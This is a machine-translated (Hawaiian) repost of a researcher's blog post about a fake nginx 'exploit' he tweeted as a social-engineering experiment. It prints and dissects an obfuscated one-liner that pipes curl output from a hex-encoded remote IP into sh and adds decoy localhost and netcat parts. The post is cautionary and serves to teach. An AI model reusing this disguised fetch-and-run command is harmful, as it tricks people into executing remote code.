ProHoster > Pūnaewele > Nā Administration > Ka holomua o ka hoʻokolohua kaiapili me ka hoʻopunipuni nginx hoʻopunipuni

Ka holomua o ka hoʻokolohua kaiapili me ka hoʻopunipuni nginx hoʻopunipuni

Nānā. unuhi.: mea kākau palapala kumu, i paʻi ʻia ma Iune 1, ua hoʻoholo e hana i kahi hoʻokolohua ma waena o ka poʻe makemake i ka palekana ʻike. No ka hana ʻana i kēia, ua hoʻomākaukau ʻo ia i kahi hoʻopunipuni hoʻopunipuni no kahi nāwaliwali i ʻike ʻole ʻia ma ka pūnaewele pūnaewele a kau ʻia ma kāna Twitter. ʻO kāna mau manaʻo - e hōʻike koke ʻia e nā poʻe loea e ʻike i ka hoʻopunipuni maopopo i ke code - ʻaʻole wale i hiki mai ... e nānā i nā mea i loko.

Ka holomua o ka hoʻokolohua kaiapili me ka hoʻopunipuni nginx hoʻopunipuni

TL; DR: Mai hoʻohana i ka pipelining file ma sh a i ʻole bash ma lalo o nā kūlana. He ala maikaʻi kēia e nalowale ai ka mana o kāu kamepiula.

Makemake wau e kaʻana like me ʻoe i kahi moʻolelo pōkole e pili ana i kahi hoʻohana PoC comic i hana ʻia ma Mei 31st. Ua ʻike koke ʻo ia i ka pane ʻana i nā lono mai ʻO Alisa Esage Shevchenko, lala ʻO ka Initiative Lā Zero (ZDI), e hōʻike koke ʻia kēlā ʻike e pili ana i kahi nāwaliwali o NGINX e alakaʻi ana i RCE (hoʻokō code mamao). Ma muli o ka mana o NGINX i nā pūnaewele he nui, pono paha ka nūhou. Akā ma muli o ka lohi i ke kaʻina hana "hōʻike kuleana", ʻaʻole i ʻike ʻia nā kikoʻī o ka mea i hana - ʻo ia ke kaʻina ZDI maʻamau.

Ka holomua o ka hoʻokolohua kaiapili me ka hoʻopunipuni nginx hoʻopunipuni
tweet e pili ana i ka hōʻike ʻana i ka nāwaliwali ma NGINX

I ka pau ʻana o ka hana ʻana i kahi ʻenehana obfuscation hou i ka curl, ua ʻōlelo wau i ka tweet kumu a "leaked i kahi PoC hana" i loaʻa i kahi laina o ke code i manaʻo ʻia e hoʻohana i ka nāwaliwali i ʻike ʻia. ʻOiai, he mea lapuwale kēia. Ua manaʻo wau e hōʻike koke ʻia wau, a ʻoi aku ka maikaʻi e loaʻa iaʻu nā retweets ʻelua (oh well).

Ka holomua o ka hoʻokolohua kaiapili me ka hoʻopunipuni nginx hoʻopunipuni
tweet me ka hoʻopunipuni hoʻopunipuni

Akā naʻe, ʻaʻole hiki iaʻu ke noʻonoʻo i ka mea i hana ma hope. Ua piʻi nui ka kaulana o kaʻu tweet. ʻO ka mea kupanaha, i kēia manawa (15: 00 Moscow manawa Iune 1) he kakaikahi ka poʻe i ʻike he hoʻopunipuni kēia. He nui ka poʻe e hoʻihoʻi hou iā ia me ka nānā ʻole ʻana iā ia (e waiho wale i ka mahalo i nā kiʻi nani ASCII i hoʻopuka ʻia).

Ka holomua o ka hoʻokolohua kaiapili me ka hoʻopunipuni nginx hoʻopunipuni
E nana wale i ka nani!

ʻOiai he maikaʻi kēia mau puka lou a me nā kala, akā pono ka poʻe e holo code ma kā lākou mīkini e ʻike iā lākou. ʻO ka mea pōmaikaʻi, hana like nā polokalamu kele pūnaewele, a hui pū me ka ʻoiaʻiʻo ʻaʻole wau i makemake e komo i loko o ka pilikia kānāwai, ʻo ke code i kanu ʻia i loko o kaʻu pūnaewele e hana wale ana i nā kelepona me ka hoʻāʻo ʻole e hoʻokomo a hoʻokō i kekahi code hou.

Hoʻokaʻawale liʻiliʻi: netspooky, dnzʻO wau a me nā poʻe ʻē aʻe o ka hui ʻO ka lehulehu Ua pāʻani mākou me nā ʻano like ʻole e hoʻokaʻawale i nā kauoha curl no kekahi manawa i kēia manawa no ka mea ʻoluʻolu ... a he geeks mākou. Ua ʻike ʻo netspooky a me dnz i nā ʻano hana hou i manaʻo nui ʻia iaʻu. Ua komo au i ka leʻaleʻa a hoʻāʻo e hoʻohui i nā hoʻololi IP decimal i ka ʻeke o nā hoʻopunipuni. ʻIke ʻia hiki ke hoʻololi ʻia ka IP i ka format hexadecimal. Eia kekahi, ʻai ka curl a me ka hapa nui o nā mea hana NIX i nā IP hexadecimal! No laila, he mea wale nō ia o ka hoʻokumu ʻana i kahi laina kauoha paʻa a paʻa. I ka hope ua hoʻoholo wau i kēia:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

ʻOi aku ka ʻenehana Socio-electronic (SEE) ma mua o ka phishing wale nō

ʻO ka palekana a me ka kamaʻāina kekahi mea nui o kēia hoʻokolohua. Manaʻo wau ʻo lākou ka mea i alakaʻi i kona holomua. Hōʻike maopopo ka laina kauoha i ka palekana ma ka pili ʻana iā "127.0.0.1" (ka localhost kaulana). Manaʻo ʻia ʻo Localhost he palekana a ʻaʻole haʻalele ka ʻikepili ma luna o kāu kamepiula.

ʻO ka kamaʻāina ka lua kī nui SEE o ka hoʻokolohua. No ka mea, ʻo ka poʻe i ʻike ʻia ka poʻe i kamaʻāina i nā kumu o ka palekana kamepiula, he mea nui ka hana ʻana i nā code i ʻike ʻia nā ʻāpana o ia mea i kamaʻāina a kamaʻāina (a no laila palekana). ʻO ka hōʻaiʻē ʻana i nā mea o ka hoʻohana ʻana i nā manaʻo kahiko a me ka hoʻohui ʻana iā lākou ma kahi ala maʻamau ua hōʻoia i ka holomua loa.

Aia ma lalo kahi kikoʻī kikoʻī o ka one-liner. Hoʻohana nā mea a pau ma kēia papa inoa ʻano hoʻonaninani, a ʻaʻohe mea i koi ʻia no kāna hana maoli.

He aha nā mea e pono ai? ʻO kēia -gsS, -O 0x0238f06a, |sh a me ke kikowaena pūnaewele ponoʻī. ʻAʻole i loaʻa i ke kikowaena pūnaewele nā ​​ʻōlelo aʻoaʻo ʻino, akā lawelawe wale ʻia nā kiʻi ASCII me ka hoʻohana ʻana i nā kauoha echo i loko o ka palapala i loko index.html. Ke komo ka mea hoʻohana i kahi laina me |sh i waena, index.html hoʻouka ʻia a hoʻokō ʻia. ʻO ka mea pōmaikaʻi, ʻaʻohe manaʻo ʻino o ka poʻe mālama o ke kikowaena pūnaewele.

  • ../../../%00 - hōʻike i ka hele ʻana ma waho o ka papa kuhikuhi;
  • ngx_stream_module.so — ala i kahi module NGINX;
  • /bin/sh%00<'protocol:TCP' - Ke hoʻomaka nei mākou /bin/sh ma ka mīkini i hoʻopaʻa ʻia a hoʻihoʻi hou i ka hopena i ke kahawai TCP;
  • -O 0x0238f06a#PLToffset - mea huna, hoʻohui ʻia #PLToffset, e like me kahi hoʻomanaʻo offset i loko o ka PLT;
  • |sh; - kekahi ʻāpana koʻikoʻi. Pono mākou e hoʻihoʻi hou i ka huahana i sh/bash i mea e hoʻokō ai i ke code e hele mai ana mai ka pūnaewele hoʻouka kaua i loaʻa ma 0x0238f06a (2.56.240.x);
  • nc /dev/tcp/localhost - he dummy kahi e kuhikuhi ai ka netcat /dev/tcp/localhosti ʻike hou ʻia ka palekana o nā mea a pau. ʻO kaʻoiaʻiʻo,ʻaʻole ia e hana a hoʻokomo i ka laina no ka nani.

Hoʻopau kēia i ka decoding o ka palapala laina hoʻokahi a me ke kūkākūkā o nā ʻano o ka "socio-electronic engineering" (phishing intricate).

Hoʻonohonoho hoʻonohonoho pūnaewele a me nā mea pale

No ka mea ʻo ka hapa nui o kaʻu mea kākau inoa he infosec/hackers, ua hoʻoholo wau e hoʻololi iki i ka pūnaewele pūnaewele i nā ʻōlelo o ka "makemake" ma kā lākou ʻaoʻao, i mea e loaʻa ai i nā kāne kahi mea e hana ai (a he mea leʻaleʻa ia. hoʻonoho). ʻAʻole wau e papa inoa i nā pilikia āpau ma ʻaneʻi no ka mea ke hoʻomau nei ka hoʻokolohua, akā eia kekahi mau mea a ke kikowaena e hana ai:

  • Ke nānā pono nei i nā hoʻāʻo hoʻohele ʻana ma kekahi mau pūnaewele kaiapili a hoʻololi i nā kiʻi liʻiliʻi like ʻole e paipai i ka mea hoʻohana e kaomi i ka loulou.
  • Hoʻihoʻi hou iā Chrome/Mozilla/Safari/etc i ke wikiō hoʻolaha Thugcrowd ma mua o ka hōʻike ʻana i ka hōʻike shell.
  • E kiaʻi no nā hōʻailona OBVIOUS o ke komo ʻana a me ka hacking, a laila hoʻomaka e hoʻohuli i nā noi i nā kikowaena NSA (ha!).
  • Hoʻokomo i kahi Trojan, a me kahi BIOS rootkit, ma nā kamepiula āpau e kipa aku nā mea hoʻohana i ka host mai kahi polokalamu maʻamau (he ʻakaʻaka wale nō!).

Ka holomua o ka hoʻokolohua kaiapili me ka hoʻopunipuni nginx hoʻopunipuni
ʻO kahi hapa liʻiliʻi o nā antimers

I kēia hihia, ʻo kaʻu pahuhopu wale nō ka haku i kekahi o nā hiʻohiʻona o Apache - ʻo ia hoʻi, nā lula maikaʻi no ka hoʻohuli ʻana i nā noi - a manaʻo wau: no ke aha?

NGINX Exploit (Maoli!)

Kakau inoa iā @alisaesage ma Twitter a hahai i ka hana nui a ZDI i ka hoʻoponopono ʻana i nā nāwaliwali maoli a hoʻohana i nā manawa kūpono ma NGINX. ʻO kā lākou hana i hoʻohauʻoli mau iaʻu a mahalo wau iā Alice no kona hoʻomanawanui i nā ʻōlelo a me nā hoʻolaha ʻana i kaʻu tweet naʻaupō. ʻO ka mea pōmaikaʻi, ua hana maikaʻi ʻia: ua kōkua i ka hoʻonui ʻana i ka ʻike o nā nāwaliwali NGINX, a me nā pilikia i hana ʻia e ka hoʻomāinoino ʻana i ka curl.

Source: www.habr.com

Pākuʻi i ka manaʻo hoʻopuka